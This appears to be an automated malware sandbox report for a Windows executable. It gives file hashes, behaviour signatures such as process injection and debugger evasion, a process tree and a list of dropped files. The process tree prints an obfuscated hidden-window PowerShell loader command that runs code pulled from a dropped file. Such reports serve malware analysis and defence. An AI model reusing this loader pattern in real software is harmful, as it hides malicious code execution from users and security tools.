Overview

overview

8

Static

static

3

8ef4d65913...7c.exe

windows7-x64

8

8ef4d65913...7c.exe

windows10-2004-x64

8

Analysis

  • max time kernel
    150s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24/05/2024, 01:31

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    8ef4d6591309fbe5f7998a82ea2db9db9c502293abf51fe37e37d860b2977d7c.exe

  • Size

    708KB

  • MD5

    1fdc4210c29446f1358360b7df89eb3e

  • SHA1

    feabe794bd8654ceaa0d2a2588b252fed6cae378

  • SHA256

    8ef4d6591309fbe5f7998a82ea2db9db9c502293abf51fe37e37d860b2977d7c

  • SHA512

    4f30ad8c74e270d7cc88f3de29fd9a2530a378b07cd5efce7867e19e007472f89da0b6a1fcc97871f4b3e16d65513369b6c34f6e4144983afcebfe35965e337a

  • SSDEEP

    12288:QuoS1Rnqm/L+toFP3ke8cfDynok2l19jjk9CTe13c:HT1Rqm/kol3Kn619k+

Score
8/10
execution

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\8ef4d6591309fbe5f7998a82ea2db9db9c502293abf51fe37e37d860b2977d7c.exe
    "C:\Users\Admin\AppData\Local\Temp\8ef4d6591309fbe5f7998a82ea2db9db9c502293abf51fe37e37d860b2977d7c.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3360
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$Induktionen=Get-Content 'C:\Users\Admin\AppData\Roaming\Neurospasm0\oversaturate\bronzeres\Rykkerbrev.Rin';$Noncredibility=$Induktionen.SubString(54173,3);.$Noncredibility($Induktionen)"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2020
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
        3⤵
          PID:4492
        • C:\Program Files (x86)\windows mail\wab.exe
          "C:\Program Files (x86)\windows mail\wab.exe"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          PID:4832

    Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mj1llsms.hpn.ps1
            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

            Download Submit

          • C:\Users\Admin\AppData\Roaming\Neurospasm0\oversaturate\bronzeres\Besonnet198.Srb
            Filesize

            318KB

            MD5

            f7fdc5a99007f4b2f31937dd8205c668

            SHA1

            6a08dffb90f21565641c0660b444ecbffc875fb0

            SHA256

            62c4dabf9dac154bf2d18d42cc1c72944d5e69109d9367211a89580ba6760583

            SHA512

            f0cca3d85832339233259e9d8f37ccc570faca62f26fd5554c0e1415e5368c1afacbe83039124927651ff33bb260a9c604912073ff3fe258f9036091afb92980

            Download Submit

          • C:\Users\Admin\AppData\Roaming\Neurospasm0\oversaturate\bronzeres\Rykkerbrev.Rin
            Filesize

            52KB

            MD5

            8feef5a2d2851a6927d27a3cdb9ef266

            SHA1

            951b7b70b5523c1a2252d2924b03335d92e73912

            SHA256

            df187dabada995e329a11f1d8eed38813eb43509252597db7e67706287be95a5

            SHA512

            458ee8fc14f094352d2e3c67e4ce7d452a0b6e5041898f2b852920e90c621665f22f53f09a56972db23e4b3c12e390c589292c4fd2777d5a0f36495ba1b2e578

            Download Submit

          • memory/2020-38-0x0000000073D30000-0x00000000744E0000-memory.dmp

            Filesize

            7.7MB

            Download

          • memory/2020-35-0x0000000008DC0000-0x000000000943A000-memory.dmp

            Filesize

            6.5MB

            Download

          • memory/2020-15-0x0000000005A10000-0x0000000005A32000-memory.dmp

            Filesize

            136KB

            Download

          • memory/2020-17-0x00000000063C0000-0x0000000006426000-memory.dmp

            Filesize

            408KB

            Download

          • memory/2020-16-0x00000000062E0000-0x0000000006346000-memory.dmp

            Filesize

            408KB

            Download

          • memory/2020-12-0x0000000005AC0000-0x00000000060E8000-memory.dmp

            Filesize

            6.2MB

            Download

          • memory/2020-23-0x0000000006430000-0x0000000006784000-memory.dmp

            Filesize

            3.3MB

            Download

          • memory/2020-37-0x0000000073D30000-0x00000000744E0000-memory.dmp

            Filesize

            7.7MB

            Download

          • memory/2020-29-0x0000000006A00000-0x0000000006A4C000-memory.dmp

            Filesize

            304KB

            Download

          • memory/2020-30-0x0000000006F40000-0x0000000006FD6000-memory.dmp

            Filesize

            600KB

            Download

          • memory/2020-31-0x0000000006EF0000-0x0000000006F0A000-memory.dmp

            Filesize

            104KB

            Download

          • memory/2020-32-0x0000000007BB0000-0x0000000007BD2000-memory.dmp

            Filesize

            136KB

            Download

          • memory/2020-33-0x0000000008190000-0x0000000008734000-memory.dmp

            Filesize

            5.6MB

            Download

          • memory/2020-13-0x0000000073D30000-0x00000000744E0000-memory.dmp

            Filesize

            7.7MB

            Download

          • memory/2020-14-0x0000000073D30000-0x00000000744E0000-memory.dmp

            Filesize

            7.7MB

            Download

          • memory/2020-10-0x0000000073D3E000-0x0000000073D3F000-memory.dmp

            Filesize

            4KB

            Download

          • memory/2020-11-0x00000000053F0000-0x0000000005426000-memory.dmp

            Filesize

            216KB

            Download

          • memory/2020-39-0x0000000073D30000-0x00000000744E0000-memory.dmp

            Filesize

            7.7MB

            Download

          • memory/2020-28-0x00000000069D0000-0x00000000069EE000-memory.dmp

            Filesize

            120KB

            Download

          • memory/2020-41-0x0000000073D30000-0x00000000744E0000-memory.dmp

            Filesize

            7.7MB

            Download

          • memory/2020-42-0x0000000009440000-0x000000000CC28000-memory.dmp

            Filesize

            55.9MB

            Download

          • memory/2020-43-0x0000000073D3E000-0x0000000073D3F000-memory.dmp

            Filesize

            4KB

            Download

          • memory/2020-44-0x0000000073D30000-0x00000000744E0000-memory.dmp

            Filesize

            7.7MB

            Download

          • memory/2020-58-0x0000000073D30000-0x00000000744E0000-memory.dmp

            Filesize

            7.7MB

            Download

          • memory/2020-53-0x0000000073D30000-0x00000000744E0000-memory.dmp

            Filesize

            7.7MB

            Download

          • memory/2020-49-0x0000000073D30000-0x00000000744E0000-memory.dmp

            Filesize

            7.7MB

            Download

          • memory/2020-46-0x0000000073D30000-0x00000000744E0000-memory.dmp

            Filesize

            7.7MB

            Download

          • memory/2020-50-0x0000000073D30000-0x00000000744E0000-memory.dmp

            Filesize

            7.7MB

            Download

          • memory/4832-51-0x0000000001000000-0x0000000002254000-memory.dmp

            Filesize

            18.3MB

            Download

          • memory/4832-48-0x0000000077738000-0x0000000077739000-memory.dmp

            Filesize

            4KB

            Download

          • memory/4832-47-0x00000000776B1000-0x00000000777D1000-memory.dmp

            Filesize

            1.1MB

            Download